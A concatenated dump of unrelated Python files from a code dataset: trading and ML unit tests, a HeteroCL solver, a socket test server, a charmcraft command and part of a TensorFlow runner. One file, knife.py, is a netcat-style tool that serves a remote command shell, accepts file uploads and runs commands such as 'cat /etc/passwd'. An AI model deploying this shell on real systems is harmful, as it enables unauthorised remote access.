\"trading_scripts.utils.helpers.Cache.API_CLIENT.list_orders\",\n side_effect=get_buy_orders,\n )\n mocker.patch(\n \"trading_scripts.utils.helpers.Cache.API_CLIENT.cancel_order\",\n side_effect=cancel_order_side_effect,\n )\n\n mocked_logger_error = mocker.patch(\"loguru.logger.error\")\n assert len(get_buy_orders()) == 1\n close_open_buy_orders()\n assert len(get_buy_orders()) == 1\n mocked_logger_error.assert_called_once()\n\n\ndef test_get_positions(mocker, mock_positions):\n # patches\n mocker.patch(\n \"trading_scripts.utils.helpers.Cache.API_CLIENT.list_positions\",\n return_value=mock_positions,\n )\n\n positions = get_positions()\n assert isinstance(positions, list)\n assert len(positions) == len(mock_positions)\n\n\ndef test_get_position_symbols(mocker, mock_positions):\n # patches\n mocker.patch(\n \"trading_scripts.utils.helpers.Cache.API_CLIENT.list_positions\",\n return_value=mock_positions,\n )\n\n positions = get_position_symbols()\n assert isinstance(positions, list)\n assert len(positions) == len(mock_positions)\n assert isinstance(positions[0], str)\n assert positions[0] == mock_positions[0].symbol\n\n\ndef test_get_last_quote(mocker, mock_barset):\n mocker.patch(\n \"trading_scripts.utils.helpers.Cache.API_CLIENT.get_barset\",\n return_value=mock_barset,\n )\n last_quote = get_last_quote(\"AAPL\")\n assert isinstance(last_quote, float)\n assert last_quote == 146.16\n\n\ndef test_get_trailing_stop_orders(mocker, mock_orders):\n def get_mock_orders(symbols=[], **kwargs):\n output = []\n for order in mock_orders:\n if order.symbol in symbols:\n output.append(order)\n return output\n\n mock_list_orders = mocker.patch(\n \"trading_scripts.utils.helpers.Cache.API_CLIENT.list_orders\",\n side_effect=get_mock_orders,\n )\n trailing_stop_orders = get_trailing_stop_orders(\"AAPL\")\n\n mock_list_orders.assert_called_once()\n assert isinstance(trailing_stop_orders, list)\n assert len(trailing_stop_orders) == 1\n assert trailing_stop_orders[0].symbol == \"AAPL\"\n\n\ndef test_get_historical_data(mocker, mock_historical_data):\n mocked_method = mocker.patch.object(\n yf.Ticker, \"history\", return_value=mock_historical_data\n )\n response = get_historical_data(\"AAPL\")\n assert isinstance(response, pd.DataFrame)\n mocked_method.assert_called_once_with(interval=\"1d\", period=\"3y\")\n columns = [\"Open\", \"High\", \"Low\", \"Close\", \"Volume\", \"Dividends\", \"Stock Splits\"]\n for column in columns:\n assert response[column] is not None\n\n\ndef test_get_account(mocker, mock_account):\n mocker.patch(\n \"trading_scripts.utils.helpers.Cache.API_CLIENT.get_account\",\n return_value=mock_account,\n )\n account = get_account()\n assert account.id == \"fake-account-id\"\n assert account.cash == \"10000.00\"\n\n\n@patch(\"os.getenv\")\n@patch(\"sys.exit\")\ndef test_validate_env_vars(mock_exit, mock_getenv):\n validate_env_vars()\n assert mock_getenv.call_count == 2\n mock_exit.assert_not_called()\n\n\ndef test_validate_env_vars_exit(mocker):\n mocked_logger_error = mocker.patch(\"loguru.logger.error\")\n mock_exit = mocker.patch(\"sys.exit\")\n mocker.patch(\"os.getenv\", return_value=False)\n\n validate_env_vars()\n mock_exit.assert_called_with(1)\n mocked_logger_error.assert_called()\n\n\ndef test_is_market_open(mocker, mock_get_clock):\n mocker.patch(\n \"trading_scripts.utils.helpers.Cache.API_CLIENT.get_clock\",\n return_value=mock_get_clock,\n )\n is_open = is_market_open()\n assert is_open\n","sub_path":"tests/test_helpers.py","file_name":"test_helpers.py","file_ext":"py","file_size_in_byte":5283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"280741341","text":"\"\"\"\n@author: David Diaz Vico\n\"\"\"\n\nfrom predictor.train import train\nfrom predictor.estimator.estimator import ClassifierBuilder\nfrom sklearn.datasets import load_iris\nfrom sklearn.dummy import DummyClassifier\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import StandardScaler\n\n\nclass DummyClassifierBuilder(ClassifierBuilder):\n\n @staticmethod\n def space(**kwargs):\n return {'strategy': {'most_frequent': None, 'uniform': None}}\n\n @staticmethod\n def build(**kwargs):\n return DummyClassifier(**kwargs)\n\n\ndef test_train():\n data = load_iris()\n predictor, metaparams, metrics = train(\n builder=DummyClassifierBuilder,\n x=data.data,\n y=data.target,\n transformers=[StandardScaler()]\n )\n assert(isinstance(predictor, Pipeline))\n assert(isinstance(metaparams, dict))\n assert(len(metaparams) == 1)\n assert('strategy' in metaparams)\n assert(metaparams['strategy'] in ('most_frequent', 'uniform'))\n assert(isinstance(metrics, dict))\n assert(len(metrics) == 1)\n assert(isinstance(metrics['accuracy_score'], float))\n assert(0.0 <= metrics['accuracy_score'] <= 1.0)\n\n\ndef test_train_initargs():\n data = load_iris()\n predictor, metaparams, metrics = train(\n builder=DummyClassifierBuilder,\n x=data.data,\n y=data.target,\n transformers=[StandardScaler()],\n init_args={'strategy': 'uniform'}\n )\n assert(isinstance(predictor, Pipeline))\n assert(isinstance(metaparams, dict))\n assert(len(metaparams) == 0)\n assert(isinstance(metrics, dict))\n assert(len(metrics) == 1)\n assert(isinstance(metrics['accuracy_score'], float))\n assert(0.0 <= metrics['accuracy_score'] <= 1.0)\n","sub_path":"tests/test_train.py","file_name":"test_train.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"539822234","text":"import getopt\r\nimport sys\r\nimport socket\r\nimport subprocess\r\nimport threading\r\nlisten=False\r\ncommand=False\r\nupload=False\r\nexecute=\"\"\r\ntarget=\"\"\r\nupload_destination=\"\"\r\nport=0\r\n\r\ndef client_handler(client_socket):\r\n global upload\r\n global execute\r\n global command\r\n if len(upload_destination):\r\n file_buffer=\"\"\r\n while True:\r\n data=client_socket.recv(1024)\r\n if not data:\r\n break\r\n else:\r\n file_buffer+=data\r\n try:\r\n file_descriptor=open(upload_destination,'wb')\r\n file_descriptor.write(file_buffer)\r\n file_descriptor.close()\r\n client_socket.send(\"Successfully saved file to \"+upload_destination)\r\n except:\r\n client_socket.send(\"Failed to save file to \"+upload_destination)\r\n if len(execute):\r\n output=run_command(execute)\r\n client_socket.send(output)\r\n if command:\r\n while True:\r\n client_socket.send(\"Tiger\")\r\n cmd_buffer=\"\"\r\n while \"\\n\" not in cmd_buffer:\r\n cmd_buffer+=client_socket.recv(1024)\r\n response=run_command(cmd_buffer)\r\n client_socket.send(response)\r\n\r\ndef run_command(command):\r\n command=command.rstrip()\r\n try:\r\n output=subprocess.check_output(command,stderr=subprocess.STDOUT,shell=True)\r\n except:\r\n output=\"Failed to execute command.\\r\\n\"\r\n return output\r\n\r\ndef server_loop():\r\n global target\r\n if not len(target):\r\n target=\"0.0.0.0\"\r\n server=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\n server.bind((target,port))\r\n server.listen(5)\r\n while True:\r\n client_socket,addr=server.accept()\r\n client_thread=threading.Thread(target=client_handler,args=(client_socket,))\r\n client_thread.start()\r\n\r\ndef client_sender(buffer):\r\n client=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\n try:\r\n client.connect((target,port))\r\n if len(buffer):\r\n client.send(buffer)\r\n while True:\r\n recv_len=1\r\n response=\"\"\r\n while recv_len:\r\n data=client.recv(4096)\r\n recv_len=len(data)\r\n response+=data\r\n if recv_len <4096:\r\n break\r\n print(response)\r\n\r\n buffer=input(\"\")\r\n buffer+=\"\\n\"\r\n client.send(buffer)\r\n except:\r\n print(\"Some error occured.\")\r\n client.close()\r\ndef usage():\r\n print('''\r\n |*****************************|\r\n | CoDeD By: |\r\n | Batukeshwar |\r\n | Vats |\r\n |*****************************|\r\n ''')\r\n print(\"Usage: knife.py -t target_host -p port\")\r\n print(\"-l --listen -listen on [host]:[port] for incoming connections.\")\r\n print(\"-e --execute = file_to_run -execute the given file upon receiving a connections.\")\r\n print(\"-c command -intitiallze a command shell\")\r\n print(\"-u --upload=destination -upon recieving a connection upload the file to the specified location.\")\r\n print(\"Examples:\")\r\n print(\"knife.py -t 192.168.0.1 -p 5555 -l -c\")\r\n print(\"knife.py -t 192.168.0.1 -p 5555 -l -u=c:\\\\target.exe\")\r\n print(\"knife.py -t 192.168.0.1 -p 5555 -l -e=\\\"cat /etc/passwd\\\"\")\r\n print(\"echo 'ABCDEFGHI | ./netcat.py -t 192.168.11.12 -p 135\")\r\n\r\ndef main():\r\n global execute\r\n global target\r\n global port\r\n global listen\r\n global command\r\n global upload_destination\r\n\r\n #if no arguments are given.\r\n if not len(sys.argv[1:]):\r\n usage()\r\n\r\n #Reading arguments if given. \r\n try:\r\n opts, args=getopt.getopt(sys.argv[1:],\"hle:t:p:cu:\",[\"help\",\"listen\",\"execute\",\"target\",\"port\",\"command\",\"upload\"])\r\n\r\n except getopt.GetoptError as err:\r\n print(str(err))\r\n usage()\r\n\r\n for o,a in opts:\r\n print(o)#o tells us about arguments\r\n #a tells us about values of those arguments\r\n print(a)\r\n if o in (\"-h\",\"--help\"):\r\n usage()\r\n elif o in (\"-l\",\"--listen\"):\r\n listen=True\r\n elif o in (\"-e\",\"--execute\"):\r\n execute=a\r\n elif o in (\"-c\",\"--commandshell\"):\r\n command=True\r\n elif o in (\"-u\",\"--upload\"):\r\n upload_destination=a\r\n elif o in (\"-t\",\"--target\"):\r\n target=a\r\n elif o in (\"-p\",\"--port\"):\r\n port=int(a)\r\n else:\r\n assert False,\"Unexpected input.\"\r\n\r\n if not listen and len(target) and port>0:\r\n buffer=sys.stdin.read()\r\n client_sender(buffer)\r\n if listen:\r\n server_loop()\r\nmain()\r\n","sub_path":"knife.py","file_name":"knife.py","file_ext":"py","file_size_in_byte":4779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"101695898","text":"import heterocl as hcl\nimport numpy as np\nimport time\nimport os\nfrom computeGraphs.graph_3D import *\n\n# Update the phi function at position (i,j,k)\ndef updatePhi(i, j, k, my_object, phi, g, x1, x2, x3):\n dV_dx1_L = hcl.scalar(0, \"dV_dx1_L\")\n dV_dx1_R = hcl.scalar(0, \"dV_dx1_R\")\n dV_dx1 = hcl.scalar(0, \"dV_dx1\")\n dV_dx2_L = hcl.scalar(0, \"dV_dx2_L\")\n dV_dx2_R = hcl.scalar(0, \"dV_dx2_R\")\n dV_dx2 = hcl.scalar(0, \"dV_dx2\")\n dV_dx3_L = hcl.scalar(0, \"dV_dx3_L\")\n dV_dx3_R = hcl.scalar(0, \"dV_dx3_R\")\n dV_dx3 = hcl.scalar(0, \"dV_dx3\")\n\n sigma1 = hcl.scalar(0, \"sigma1\")\n sigma2 = hcl.scalar(0, \"sigma2\")\n sigma3 = hcl.scalar(0, \"sigma3\")\n\n # dV_dx_L[0], dV_dx_R[0] = spa_derivX(i, j, k)\n dV_dx1_L[0], dV_dx1_R[0] = spa_derivX(i, j, k, phi, g)\n dV_dx2_L[0], dV_dx2_R[0] = spa_derivY(i, j, k, phi, g)\n dV_dx3_L[0], dV_dx3_R[0] = spa_derivT(i, j, k, phi, g)\n\n # Calculate average gradient\n dV_dx1[0] = (dV_dx1_L[0] + dV_dx1_R[0]) / 2\n dV_dx2[0] = (dV_dx2_L[0] + dV_dx2_R[0]) / 2\n dV_dx3[0] = (dV_dx3_L[0] + dV_dx3_R[0]) / 2\n\n # Find the optimal control through my_object's API\n uOpt = my_object.opt_ctrl(0, (x1[i], x2[j], x3[k]),\n (dV_dx1[0], dV_dx2[0], dV_dx3[0]))\n dOpt = my_object.optDstb(0, (x1[i], x2[j], x3[k]),\n (dV_dx1[0], dV_dx2[0], dV_dx3[0]))\n\n # Calculate dynamical rates of changes\n dx1_dt, dx2_dt, dx3_dt = my_object.dynamics(0, (x1[i], x2[j], x3[k]), uOpt, dOpt)\n\n H = hcl.scalar(0, \"H\")\n phiNew = hcl.scalar(0, \"phiNew\")\n diss1 = hcl.scalar(0, \"diss1\")\n diss2 = hcl.scalar(0, \"diss2\")\n diss3 = hcl.scalar(0, \"diss3\")\n\n # Calculate Hamiltonian terms:\n H[0] = (-(dx1_dt * dV_dx1[0] + dx2_dt * dV_dx2[0] + dx3_dt * dV_dx3[0] + 1))\n\n # Calculate the \"dissipation\"\n sigma1[0] = my_abs(dx1_dt)\n sigma2[0] = my_abs(dx2_dt)\n sigma3[0] = my_abs(dx3_dt)\n c = hcl.scalar(0, \"c\")\n c[0] = sigma1[0] / g.dx[0] + sigma2[0] / g.dx[1] + sigma3[0] / g.dx[2]\n\n diss1[0] = sigma1[0] * ((dV_dx1_R[0] - dV_dx1_L[0]) / 2 + phi[i, j, k] / g.dx[0])\n diss2[0] = sigma2[0] * ((dV_dx2_R[0] - dV_dx2_L[0]) / 2 + phi[i, j, k] / g.dx[1])\n diss3[0] = sigma3[0] * ((dV_dx3_R[0] - dV_dx3_L[0]) / 2 + phi[i, j, k] / g.dx[2])\n\n # New phi\n phiNew[0] = (-H[0] + diss1[0] + diss2[0] + diss3[0]) / c[0]\n #debugger[i,j,k] = phiNew[0]\n phi[i, j, k] = my_min(phi[i, j ,k], phiNew[0])\n\ndef EvalBoundary(phi, g):\n if 0 not in g.pDim:\n with hcl.for_(0, phi.shape[1], name=\"j\") as j:\n with hcl.for_(0, phi.shape[2], name=\"k\") as k:\n #debug2[0] = j\n tmp1 = hcl.scalar(0, \"tmp1\")\n tmp1[0] = 2 * phi[1, j, k] - phi[2, j, k]\n tmp1[0] = my_max(tmp1[0], phi[2, j, k])\n phi[0, j, k] = my_min(tmp1[0], phi[0, j, k])\n\n tmp2 = hcl.scalar(0, \"tmp2\")\n tmp2[0] = 2 * phi[phi.shape[0] - 2, j, k] - phi[phi.shape[0] - 3, j, k]\n tmp2[0] = my_max(tmp2[0], phi[phi.shape[0] - 3, j, k])\n phi[phi.shape[0] - 1, j, k] = my_min(tmp2[0], phi[phi.shape[0] - 1, j, k])\n\n if 1 not in g.pDim:\n with hcl.for_(0, phi.shape[0], name=\"i\") as i:\n with hcl.for_(0, phi.shape[2], name=\"k\") as k:\n tmp1 = hcl.scalar(0, \"tmp1\")\n tmp1[0] = 2 * phi[i, 1, k] - phi[i, 2, k]\n tmp1[0] = my_max(tmp1[0], phi[i, 2, k])\n phi[i, 0, k] = my_min(tmp1[0], phi[i, 0, k])\n\n tmp2 = hcl.scalar(0, \"tmp2\")\n tmp2[0] = 2 * phi[i, phi.shape[1] - 2, k] - phi[i, phi.shape[1] - 3, k]\n tmp2[0] = my_max(tmp2[0], phi[i, phi.shape[1] - 3, k])\n phi[i, phi.shape[1] - 1, k] = my_min(tmp2[0], phi[i, phi.shape[1] - 1, k])\n\n if 2 not in g.pDim:\n with hcl.for_(0, phi.shape[0], name=\"i\") as i:\n with hcl.for_(0, phi.shape[1], name=\"j\") as j:\n tmp1 = hcl.scalar(0, \"tmp1\")\n tmp1[0] = 2 * phi[i, j, 1] - phi[i, j, 2]\n tmp1[0] = my_max(tmp1[0], phi[i, j, 2])\n phi[i, j, 0] = my_min(tmp1[0], phi[i, j, 0])\n\n tmp2 = hcl.scalar(0, \"tmp2\")\n tmp2[0] = 2 * phi[i, j, phi.shape[2] - 2] - phi[i, j, phi.shape[2] - 3]\n tmp2[0] = my_max(tmp2[0], phi[i, j, phi.shape[2] - 3])\n phi[i, j, phi.shape[2] - 1] = my_min(tmp2[0], phi[i, j, phi.shape[2] - 1])\n\n\n# Returns 0 if convergence has been reached\ndef evaluateConvergence(newV, oldV, epsilon, reSweep):\n delta = hcl.scalar(0, \"delta\")\n # Calculate the difference, if it's negative, make it positive\n delta[0] = newV[0] - oldV[0]\n with hcl.if_(delta[0] < 0):\n delta[0] = delta[0] * -1\n with hcl.if_(delta[0] > epsilon[0]):\n reSweep[0] = 1\n\n######################################### TIME-TO-REACH COMPUTATION ##########################################\n\ndef TTR_3D(my_object, g):\n def solve_phiNew(phi, x1, x2, x3):\n l_i = 0 if 0 in g.pDim else 1\n h_i = phi.shape[0] if 0 in g.pDim else phi.shape[0] - 1\n l_j = 0 if 1 in g.pDim else 1\n h_j = phi.shape[1] if 1 in g.pDim else phi.shape[1] - 1\n l_k = 0 if 2 in g.pDim else 1\n h_k = phi.shape[2] if 2 in g.pDim else phi.shape[2] - 1\n # Perform value iteration by sweeping in direction 1\n with hcl.Stage(\"Sweep_1\"):\n with hcl.for_(l_i, h_i, name=\"i\") as i:\n with hcl.for_(l_j, h_j, name=\"j\") as j:\n with hcl.for_(l_k, h_k, name=\"k\") as k:\n updatePhi(i, j, k, my_object, phi, g, x1, x2, x3)\n # debug2[0] = j\n EvalBoundary(phi, g)\n\n # Perform value iteration by sweeping in direction 2\n with hcl.Stage(\"Sweep_2\"):\n with hcl.for_(l_i, h_i, name=\"i\") as i:\n with hcl.for_(l_j, h_j, name=\"j\") as j:\n with hcl.for_(l_k, h_k, name=\"k\") as k:\n i2 = phi.shape[0] - i - 1\n j2 = phi.shape[1] - j - 1\n k2 = phi.shape[2] - k - 1\n updatePhi(i2, j2, k2, my_object, phi, g, x1, x2, x3)\n EvalBoundary(phi, g)\n\n # Perform value iteration by sweeping in direction 3\n with hcl.Stage(\"Sweep_3\"):\n with hcl.for_(l_i, h_i, name=\"i\") as i:\n with hcl.for_(l_j, h_j, name=\"j\") as j:\n with hcl.for_(l_k, h_k, name=\"k\") as k:\n j2 = phi.shape[1] - j - 1\n k2 = phi.shape[2] - k - 1\n updatePhi(i, j2, k2, my_object, phi, g, x1, x2, x3)\n EvalBoundary(phi, g)\n\n\n # Perform value iteration by sweeping in direction 4\n with hcl.Stage(\"Sweep_4\"):\n with hcl.for_(l_i, h_i, name=\"i\") as i:\n with hcl.for_(l_j, h_j, name=\"j\") as j:\n with hcl.for_(l_k, h_k, name=\"k\") as k:\n i2 = phi.shape[0] - i - 1\n j2 = phi.shape[1] - j - 1\n updatePhi(i2, j2, k, my_object, phi, g, x1, x2, x3)\n EvalBoundary(phi, g)\n\n # Perform value iteration by sweeping in direction 5\n with hcl.Stage(\"Sweep_5\"):\n with hcl.for_(l_i, h_i, name=\"i\") as i:\n with hcl.for_(l_j, h_j, name=\"j\") as j:\n with hcl.for_(l_k, h_k, name=\"k\") as k:\n i2 = phi.shape[0] - i - 1\n k2 = phi.shape[2] - k - 1\n updatePhi(i2, j, k2, my_object, phi, g, x1, x2, x3)\n EvalBoundary(phi, g)\n\n\n # Perform value iteration by sweeping in direction 6\n with hcl.Stage(\"Sweep_6\"):\n with hcl.for_(l_i, h_i, name=\"i\") as i:\n with hcl.for_(l_j, h_j, name=\"j\") as j:\n with hcl.for_(l_k, h_k, name=\"k\") as k:\n i2 = phi.shape[0] - i - 1\n updatePhi(i2, j, k, my_object, phi, g, x1, x2, x3)\n EvalBoundary(phi, g)\n\n # Perform value iteration by sweeping in direction 7\n with hcl.Stage(\"Sweep_7\"):\n with hcl.for_(l_i, h_i, name=\"i\") as i:\n with hcl.for_(l_j, h_j, name=\"j\") as j:\n with hcl.for_(l_k, h_k, name=\"k\") as k:\n j2 = phi.shape[1] - j - 1\n updatePhi(i, j2, k, my_object, phi, g, x1, x2, x3)\n EvalBoundary(phi, g)\n\n # Perform value iteration by sweeping in direction 8\n with hcl.Stage(\"Sweep_8\"):\n with hcl.for_(l_i, h_i, name=\"i\") as i:\n with hcl.for_(l_j, h_j, name=\"j\") as j:\n with hcl.for_(l_k, h_k, name=\"k\") as k:\n k2 = phi.shape[2] - k - 1\n updatePhi(i, j, k2, my_object, phi, g, x1, x2, x3)\n EvalBoundary(phi, g)\n\n ###################################### SETUP PLACEHOLDERS ######################################\n \n # Initialize the HCL environment\n hcl.init()\n hcl.config.init_dtype = hcl.Float()\n\n # Positions vector\n x1 = hcl.placeholder((g.pts_each_dim[0],), name=\"x1\", dtype=hcl.Float())\n x2 = hcl.placeholder((g.pts_each_dim[1],), name=\"x2\", dtype=hcl.Float())\n x3 = hcl.placeholder((g.pts_each_dim[2],), name=\"x3\", dtype=hcl.Float())\n phi = hcl.placeholder(tuple(g.pts_each_dim), name=\"phi\", dtype=hcl.Float())\n #debugger = hcl.placeholder(tuple(g.pts_each_dim), name=\"debugger\", dtype=hcl.Float())\n #debug2 = hcl.placeholder((0,), \"debug2\")\n\n # Create a static schedule -- graph\n s = hcl.create_schedule([phi, x1, x2, x3], solve_phiNew)\n\n # Build an executable and return\n return hcl.build(s)\n","sub_path":"TimeToReach/TimeToReach_3D.py","file_name":"TimeToReach_3D.py","file_ext":"py","file_size_in_byte":10084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"190857009","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# vim:fenc=utf-8\n# Last modified: 2016-09-02 17:10:56\n\nimport socket\n# import da\nimport sys\nimport send\nimport logging\nimport os\n\n\ndef string_parser(sockfd, src, p):\n if src == \"connect\":\n logging.debug(\"connect\")\n elif src == \"disconnect\":\n logging.debug(\"dissconnect\")\n elif src == \"reset\":\n logging.debug(\"reset\")\n elif src == \"pause\":\n logging.debug(\"pause\")\n elif src == \"resume\":\n logging.debug(\"resume\")\n elif src == \"cancel\":\n logging.debug(\"cancel\")\n elif src == \"home\":\n logging.debug(\"home\")\n elif src == \"send_now\":\n logging.debug(\"send_now\")\n elif src == \"startprint\":\n logging.debug(\"startprint\")\n else:\n logging.warning(\"no commend\")\n return p\n\n\ndef main():\n try:\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n except socket.error:\n logging.debug(\"socket error\")\n sys.exit(1)\n\n port = 8888\n host = '' # Symbolic name meaning all available interfaces\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # reuse tcp\n sock.bind((host, port))\n sock.listen(5)\n # sock.settimeout(10)\n\n p = None\n try:\n while True:\n logging.debug(\"server accept\")\n (csock, adr) = sock.accept()\n print (\"Client Info: \", csock, adr)\n src = csock.recv(1024)\n if not src:\n pass\n else:\n p = string_parser(csock, src, p)\n print (\"Client send: \" + src)\n csock.send(\"Hello I'm Server.\\r\\n\")\n except KeyboardInterrupt:\n print(\"KeyboardInterrupt! Stop server\")\n csock.close()\n sys.exit(0)\n finally:\n csock.close()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"src/python/test_server.py","file_name":"test_server.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"364824793","text":"# Copyright 2021 Canonical Ltd.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# For further info, check https://github.com/canonical/charmcraft\n\n\"\"\"Infrastructure for the 'clean' command.\"\"\"\n\nimport logging\n\nfrom charmcraft.cmdbase import BaseCommand\nfrom charmcraft.metadata import parse_metadata_yaml\nfrom charmcraft.providers import get_provider\n\nlogger = logging.getLogger(__name__)\n\n_overview = \"\"\"\nPurge Charmcraft project's artifacts, including:\n\n- LXD Containers created for building charm(s)\n\"\"\"\n\n\nclass CleanCommand(BaseCommand):\n \"\"\"Clean project artifacts.\"\"\"\n\n name = \"clean\"\n help_msg = \"Purge project artifacts\"\n overview = _overview\n common = True\n\n def run(self, parsed_args):\n \"\"\"Run the command.\"\"\"\n project_path = self.config.project.dirpath\n metadata = parse_metadata_yaml(project_path)\n logger.debug(\"Cleaning project %r.\", metadata.name)\n\n provider = get_provider()\n provider.clean_project_environments(charm_name=metadata.name, project_path=project_path)\n logger.info(\"Cleaned project %r.\", metadata.name)\n","sub_path":"charmcraft/commands/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"608328125","text":"import os\nimport threading\n\nimport numpy as np\nimport tensorflow as tf\n\nimport utils\nfrom mlp.fcn import FCN\nfrom stratify import StratifiedShuffle\n\n\nclass FCNRunner:\n \"\"\"\n This class acts as a factory and controller for fcn.py\n FullyConnectedNet builds a tensorflow graph that represents the NN and its evaluation ops.\n FCNRunner uses the FullyConnectedNet graph to build two other graphs: one for training and one for validation.\n A good thing is that both the training and testing graphs share the same variables (https://www.tensorflow.org/versions/r0.11/how_tos/variable_scope/index.html)\n So there is no memory duplication of parameters, or duplication of the process of building up the NN twice.\n +----------------------------------------------------------------------------+\n | training |\n | data |\n | pipeline |\n | + +----------+ |\n | +----> | Fully +-------> train_loss, train_accuracy, optimization_op |\n | | Connected| |\n | +----> | Net +-------> validation_loss, validation_accuracy |\n | + +----------+ |\n | validation |\n | data |\n | pipeline |\n +----------------------------------------------------------------------------+\n The training output ops (train_loss, etc...) are only concerned with applying the FCN to the training data.\n The validation output ops (validation_loss, etc...) are only concerned with applying the FCN to the validation data.\n \"\"\"\n\n def __init__(self, config, params):\n\n self.config = config\n\n # config:\n self.log_folder = config.get_rel_path(\"PATHS\", \"log_folder\")\n self.experiment_ID = config.get(\"PROCESS\", \"experiment_ID\") or utils.date_time_string()\n self.max_checkpoints = config.getint(\"PROCESS\", \"max_checkpoints\") or 5\n self.validation_interval = config.getint(\"PROCESS\", \"validation_interval\", fallback=15)\n # self.keep_prob = config.getfloat(\"TRAINING\", \"dropout_keep_probability\", fallback=1.0)\n self.keep_prob = params['dropout_keep_probability']\n self.num_epochs = config.getint(\"TRAINING\", \"num_epochs\", fallback=0)\n self.batch_size = params['batch_size']\n\n self.network = FCN(config, params)\n self.validation_window = params['validation_window']\n self.val_check_after = config.getint(\"PROCESS\", \"val_check_after\", fallback=1000)\n\n def bind_training_dataqueue_dataframe(self, train_data_cols, params):\n config = self.config\n\n # train_batch_size = config.getint(\"TRAINING\", \"batch_size\")\n train_batch_size = params['batch_size']\n with tf.name_scope(\"Train\"):\n self.network.bind_graph_dataframe(\"TRAIN\", train_data_cols,\n train_batch_size,\n reuse=False,\n with_training_op=True)\n self.train_op = self.network.train_op\n self.train_loss = self.network.loss\n self.train_str_accu = self.network.streaming_accu_op\n self.train_accuracy = self.network.accuracy\n if self.network.ground_truth_slicer is not None:\n self.train_auc = self.network.auc\n\n self.train_summaries_merged = self.network.get_summaries()\n\n def bind_validation_dataqueue_dataframe(self, valid_data_cols):\n config = self.config\n\n # now reuse the graph to bind new OPs that handle the validation data:\n valid_batch_size = config.getint(\"TRAINING\", \"validation_batch_size\")\n with tf.name_scope(\"Valid\"):\n self.network.bind_graph_dataframe(\"VALID\", valid_data_cols, valid_batch_size, reuse=True,\n with_training_op=False)\n self.valid_loss = self.network.loss\n self.valid_str_accu = self.network.streaming_accu_op\n self.valid_accuracy = self.network.accuracy\n if self.network.ground_truth_slicer is not None:\n self.valid_auc = self.network.auc\n\n self.valid_summaries_merged = self.network.get_summaries()\n\n def bind_test_dataqueue_dataframe(self, test_data_cols):\n config = self.config\n\n # now resuse the graph to bind new OPS that handle the test data:\n test_batch_size = config.getint(\"TEST\", \"batch_size\")\n with tf.name_scope(\"Test\"):\n self.network.bind_graph_dataframe(\"TEST\", test_data_cols, test_batch_size, reuse=True,\n with_training_op=False)\n self.test_loss = self.network.loss\n self.test_str_accu = self.network.streaming_accu_op\n self.test_accuracy = self.network.accuracy\n self.test_summaries_merged = self.network.get_summaries()\n self.test_predictions = self.network.predictions\n self.test_pred_path = config.get_rel_path(\"TEST\", \"write_predictions_to\")\n\n def initialize(self):\n config = self.config\n self.session = tf.Session()\n\n self.checkpoint_every = config.getint(\"PROCESS\", \"checkpoint_every\")\n self.checkpoint_path = config.get_rel_path(\"PATHS\", \"checkpoint_dir\") + \"/training.ckpt\"\n\n load_checkpoint = config.get(\"PROCESS\", \"initialize_with_checkpoint\") or None\n if load_checkpoint:\n self.load_checkpoint(load_checkpoint)\n else:\n self.saver = tf.train.Saver(tf.global_variables(), max_to_keep=self.max_checkpoints)\n\n if config.getint(\"TRAINING\", \"num_epochs\") > 0:\n self.session.run(tf.global_variables_initializer())\n\n self.session.run(tf.local_variables_initializer()) # for streaming metrics\n\n self.create_summary_writers()\n\n # TODO: No need for queue_runners anymore\n # coord = tf.train.Coordinator()\n # tf.train.start_queue_runners(sess=self.session, coord=coord)\n # start_queue_runners has to be called for any Tensorflow graph that uses queues.\n\n tensorboard_thread = threading.Thread(target=self.start_tensorboard, args=())\n tensorboard_thread.start()\n\n def create_summary_writers(self):\n\n if hasattr(self, \"train_summaries_merged\"):\n self.train_summary_writer = tf.summary.FileWriter(\"%s/%s_train\" % (self.log_folder, self.experiment_ID),\n self.session.graph)\n\n if hasattr(self, \"valid_summaries_merged\"):\n self.valid_summary_writer = tf.summary.FileWriter(\"%s/%s_valid\" % (self.log_folder, self.experiment_ID))\n\n if hasattr(self, \"test_summaries_merged\"):\n self.test_summary_writer = tf.summary.FileWriter(\"%s/%s_test\" % (self.log_folder, self.experiment_ID))\n\n def close_session(self):\n self.session.close()\n\n def test(self, test_features, test_labels):\n pass\n\n def train_once_dataframe(self, epoch, i, input_batch, label_batch, reg_label_batch):\n feed_dict = {self.network.keep_prob: self.keep_prob,\n self.network.is_training: True,\n self.network.input_features_placeholder: input_batch}\n tensors = [self.train_op, self.train_loss, self.train_summaries_merged, self.train_accuracy,\n self.train_str_accu]\n\n if label_batch is not None:\n feed_dict.update({self.network.input_label_placeholder: label_batch})\n tensors.append(self.train_auc)\n _, train_loss, training_summary, training_accuracy, train_streaming_accuracy, train_auc = self.session.run(\n tensors, feed_dict=feed_dict)\n\n if reg_label_batch is not None:\n feed_dict.update({self.network.reg_input_placeholder: reg_label_batch})\n _, train_loss, training_summary, training_accuracy, train_streaming_accuracy = self.session.run(\n 